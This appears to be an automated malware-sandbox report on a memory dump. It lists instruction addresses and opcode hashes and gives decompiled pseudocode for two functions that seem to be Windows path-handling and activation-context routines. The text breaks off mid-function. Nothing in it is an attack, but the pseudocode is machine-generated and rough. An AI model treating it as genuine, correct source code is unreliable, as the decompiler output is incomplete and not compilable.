0x01c06159
0x01c06159
0x01c0615c
0x01c06163
0x01c06169
0x01c0616c
0x01c06172
0x01c06181
0x01c06186
0x01c06187
0x01c0618b
0x01c06191
0x01c06195
0x01c061a3
0x01c061bb
0x01c061c0
0x01c061c3
0x01c061cc
0x01c061d0
0x01c061dc
0x01c061de
0x01c061e1
0x01c061e4
0x01c061e6
0x01c061e8
0x01c061e8
0x01c061e8
0x01c061e8
0x01c061e6
0x01c061ec
0x01c061f3
0x01c06203
0x01c06209
0x01c0620a
0x01c06216
0x01c0621d
0x01c06227
0x01c06241
0x01c06246
0x01c0624c
0x01c06257
0x01c06259
0x01c0625c
0x01c0625e
0x01c06260
0x01c06260
0x01c06260
0x01c06260
0x01c0625e
0x01c06264
0x01c06267
0x01c06269
0x01c06315
0x01c06315
0x01c0631b
0x01c0631e
0x01c06324
0x01c06327
0x01c0632f
0x01c06330
0x01c06333
0x01c0633a
0x01c0633c
0x01c06335
0x01c06335
0x01c06335
0x01c0633f
0x01c06342
0x01c0634c
0x01c06352
0x01c06355
0x01c06355
0x01c06359
0x00000000
0x01c0626f
0x01c06275
0x01c06275
0x01c06278
0x01c0627e
0x01c0627e
0x01c06281
0x01c06287
0x01c0628d
0x01c06298
0x01c0629c
0x01c062a2
0x01c0629e
0x01c0629e
0x01c0629e
0x01c062a7
0x01c062a7
0x01c062aa
0x01c062b0
0x01c062f0
0x01c062f0
0x01c062f2
0x01c062f8
0x01c062fd
0x01c062b2
0x01c062b2
0x01c062b2
0x01c062b5
0x01c062dd
0x01c062e2
0x01c062e5
0x01c062b7
0x01c062b8
0x01c062bb
0x01c062bd
0x01c062c0
0x01c062c4
0x01c062cd
0x01c062cd
0x01c062c0
0x01c062bb
0x01c062b5
0x01c06302
0x01c06303
0x01c06305
0x01c06305
0x01c06305
0x01c0630c
0x01c0630c
0x00000000
0x01c0627e
0x01c06269
0x01c05eac
0x01c05ebb
0x01c05ebe
0x01c05ecb
0x01c05ecb
0x01c05ece
0x01c05ece
0x01c05ed4
0x01c05ed7
0x01c05ed9
0x01c05edb
0x01c05edb
0x01c05ee1
0x01c05ee1
0x01c05ee3
0x01c05f20
0x01c05f20
0x01c05ee5
0x01c05ee5
0x01c05ee5
0x01c05ee8
0x01c05f11
0x01c05f18
0x01c05eea
0x01c05eea
0x01c05eed
0x01c05ef2
0x01c05ef8
0x01c05efb
0x01c05f0a
0x01c05f0a
0x01c05eed
0x01c05ee8
0x01c05f22
0x01c05f28
0x00000000
0x00000000
0x01c05f30
0x01c05f31
0x01c05f37
0x01c05f3a
0x01c05f3d
0x01c05f44
0x00000000
0x00000000
0x00000000
0x01c05f46
0x01c05f48
0x01c05f4d
0x00000000
0x01c05f4d
0x01c05dda
0x01c05ddf
0x00000000
0x01c05ddf
0x01c05dd8
0x01c05da7
0x01c05da9
0x01c05dac
0x01c05dae
0x00000000
0x01c05db4
0x01c05db4
0x00000000
0x01c05db4
0x01c05dae
0x01c05d88
0x01c05d8d
0x01c06363
0x01c06369
0x01c0636a
0x01c06370
0x01c06372
0x01c0637a
0x01c0637b
0x01c0637d
0x00000000
0x00000000
0x01c0637f
0x01c06385
0x00000000
0x01c06385
0x01c05d38
0x01c05d3b
0x00000000
0x00000000
0x00000000
0x01c05d3b
0x01c05d27
0x01c05d29
0x00000000
0x00000000
0x00000000
0x01c06360
0x00000000
0x01c06360
0x01c05c10
0x01c05c10
0x01c063da
0x01c063e5
0x01c063e5

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e60f2520381d709ad65f1cb77b959aecde446d574bfdaef7dcaf1778abcddc79
Instruction ID: a01b9cb4080bf0abc3de4c99716c5bff78d2970d81dc529b8ac48fc826abe1de
Opcode Fuzzy Hash: e60f2520381d709ad65f1cb77b959aecde446d574bfdaef7dcaf1778abcddc79
Instruction Fuzzy Hash: C3425C75900229CFDB25CF68C880BA9BBB1FF49704F1481AAD95DEB282D734DA95CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01B54120, Relevance: .4, Instructions: 444
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E01B54120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x1c2d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E01B6F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E01B56E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L01B54620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E01B56E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M01B545F8))) {
												case 0:
													_v568 = 0x1b11078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x1b111c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L01B54620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E01B7F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E01B7F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E01B352A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E01B4EB70(1, 0x1c279a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E01B4AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E01B795D0();
																			L01B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L01B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E01B7B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E01B73D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E01B7B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}

0x01b54128
0x01b54135
0x01b5413c
0x01b54141
0x01b54145
0x01b54147
0x01b5414e
0x01b54151
0x01b54159
0x01b5415c
0x01b54160
0x01b54164
0x01b54168
0x01b5416c
0x01b5417f
0x01b54181
0x01b5446a
0x01b5446a
0x01b5418c
0x01b54195
0x01b54199
0x01b54432
0x01b54439
0x01b5443d
0x01b54442
0x01b54447
0x00000000
0x01b5419f
0x01b541a3
0x01b541b1
0x01b541b9
0x01b541bd
0x01b545db
0x01b545db
0x00000000
0x01b541c3
0x01b541c3
0x01b541ce
0x01b541d4
0x01b9e138
0x01b9e13e
0x01b9e169
0x01b9e16d
0x01b9e19e
0x01b9e16f
0x01b9e16f
0x01b9e175
0x01b9e179
0x01b9e18f
0x01b9e193
0x00000000
0x01b9e199
0x00000000
0x01b9e199
0x01b9e193
0x00000000
0x00000000
0x00000000
0x01b541da
0x01b541da
0x01b541df
0x01b541e4
0x01b541ec
0x01b54203
0x01b54207
0x01b9e1fd
0x01b54222
0x01b54226
0x01b9e1f3
0x01b9e1f3
0x01b5422c
0x01b5422c
0x01b54233
0x01b9e1ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x01b54239
0x01b54239
0x01b54239
0x01b54239
0x01b54233
0x01b54226
0x01b541ee
0x01b541ee
0x01b541f4
0x01b54575
0x01b9e1b1
0x01b9e1b1
0x00000000
0x01b5457b
0x01b5457b
0x01b54582
0x01b9e1ab
0x00000000
0x00000000
0x00000000
0x00000000
0x01b54588
0x01b54588
0x01b5458c
0x01b9e1c4
0x01b9e1c4
0x00000000
0x01b54592
0x01b54592
0x01b54599
0x01b9e1be
0x00000000
0x00000000
0x00000000
0x00000000
0x01b5459f
0x01b5459f
0x01b545a3
0x01b9e1d7
0x01b9e1e4
0x00000000
0x01b545a9
0x01b545a9
0x01b545b0
0x01b9e1d1
0x00000000
0x00000000
0x00000000
0x00000000
0x01b545b6
0x01b545b6
0x01b545b6
0x00000000
0x01b545b6
0x01b545b0
0x01b545a3
0x01b54599
0x01b5458c
0x01b54582
0x00000000
0x00000000
0x00000000
0x00000000
0x01b541f4
0x01b5423e
0x01b54241
0x01b545c0
0x01b545c4
0x00000000
0x01b545ca
0x01b545ca
0x00000000
0x01b9e207
0x01b9e20f
0x00000000
0x00000000
0x00000000
0x00000000
0x01b545d1
0x00000000
0x00000000
0x01b545ca
0x00000000
0x01b54247
0x01b54247
0x01b54247
0x01b54249
0x01b54249
0x01b54249
0x01b54251
0x01b54251
0x01b54257
0x01b5425f
0x01b5426e
0x01b54270
0x01b5427a
0x01b9e219
0x01b9e219
0x01b54280
0x01b54282
0x01b54456
0x01b545ea
0x00000000
0x01b545f0
0x01b9e223
0x00000000
0x01b9e223
0x01b5445c
0x01b5445c
0x00000000
0x01b5445c
0x00000000
0x01b54288
0x01b5428c
0x01b9e298
0x01b54292
0x01b54292
0x01b5429e
0x01b542a3
0x01b542a7
0x01b542ac
0x01b9e22d
0x01b542b2
0x01b542b2
0x01b542b9
0x01b542bc
0x01b542c2
0x01b542ca
0x01b542cd
0x01b542cd
0x01b542d4
0x01b5433f
0x01b5433f
0x01b542d6
0x01b542d6
0x01b542d9
0x01b542dd
0x01b542eb
0x01b9e23a
0x01b542f1
0x01b54305
0x01b5430d
0x01b54315
0x01b54318
0x01b5431f
0x01b54322
0x01b5432e
0x01b5433b
0x01b5433b
0x00000000
0x01b5432e
0x01b542eb
0x01b5434c
0x01b5434e
0x01b54352
0x01b54359
0x01b5435e
0x01b54361
0x01b5436e
0x01b5438a
0x01b5438e
0x01b54396
0x01b5439e
0x01b543a1
0x01b543ad
0x01b543bb
0x01b543bb
0x01b543ad
0x01b5436e
0x01b543bf
0x01b543c5
0x01b54463
0x01b54463
0x01b543ce
0x01b543d5
0x01b543d9
0x01b543df
0x01b54475
0x01b54479
0x01b54491
0x01b54491
0x01b54479
0x01b543e5
0x01b543eb
0x01b543f4
0x01b543f6
0x01b543f9
0x01b543fc
0x01b543ff
0x01b544e8
0x01b544ed
0x01b544f3
0x01b9e247
0x00000000
0x01b544f9
0x01b54504
0x01b54508
0x01b5450f
0x01b9e269
0x00000000
0x01b54515
0x01b54519
0x01b54531
0x01b54534
0x01b54537
0x01b5453e
0x01b54541
0x01b5454a
0x01b9e255
0x01b9e255
0x01b9e25b
0x01b9e25e
0x01b9e261
0x01b9e261
0x01b54555
0x01b54559
0x01b5455d
0x01b9e26d
0x01b9e270
0x01b9e274
0x01b9e27a
0x01b9e27d
0x01b9e28e
0x01b9e28e
0x01b54563
0x01b54563
0x01b54569
0x01b54569
0x00000000
0x01b5455d
0x01b5450f
0x00000000
0x01b544f3
0x01b543ff
0x01b54405
0x01b54405
0x01b54405
0x01b542ac
0x01b5428c
0x01b54282
0x01b54407
0x01b5440d
0x01b9e2af
0x01b9e2af
0x01b54413
0x01b54413
0x00000000
0x01b541d4
0x00000000
0x01b541c3
0x01b541bd
0x01b54415
0x01b54415
0x01b54416
0x01b54417
0x01b54429
0x01b5416e
0x01b5416e
0x01b54175
0x01b54498
0x01b5449f
0x01b9e12d
0x00000000
0x01b9e133
0x00000000
0x01b9e133
0x01b544a5
0x01b544a5
0x01b544aa
0x00000000
0x01b544bb
0x01b544ca
0x01b544d6
0x01b544d7
0x01b544d8
0x01b544e3
0x01b544e3
0x01b544aa
0x01b5417b
0x01b5417b
0x01b5417b
0x00000000
0x01b5417b
0x01b54175
0x00000000

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 941afff021b8032de25538ae13fc381e65ffe1a78c660946066daaab0177a9a4
Instruction ID: fba2bbeab35745799906e6b38b57c65e8aa557666640e78b43a26c5ea3df0735
Opcode Fuzzy Hash: 941afff021b8032de25538ae13fc381e65ffe1a78c660946066daaab0177a9a4
Instruction Fuzzy Hash: F6F19E706082518FCB68CF19C480B7ABBE1FF88754F1449AEF986CB251E735D982CB52

Uniqueness

Uniqueness Score: -1.00%

Function 01B620A0, Relevance: .4, Instructions: 420
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E01B620A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x1c28714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E01B62EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E01B62EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E01B358EC(_t240);
									_t221 =  *0x1c25cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x1c25cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E01B74A2C(0x1c26e40, 0x1b74b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E01B57D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x1b15c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E01B6F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E01B6F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E01BB7016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L01B52400(_t267 + 0x20);
															}
															L01B52400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E01B62397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E01B52280(_t134, 0x1c28608);
									__eflags =  *0x1c26e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E01B4FFB0(_t198, _t241, 0x1c28608);
										__eflags = _t253;
										if(_t253 != 0) {
											L01B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x1c26e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x1c28608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
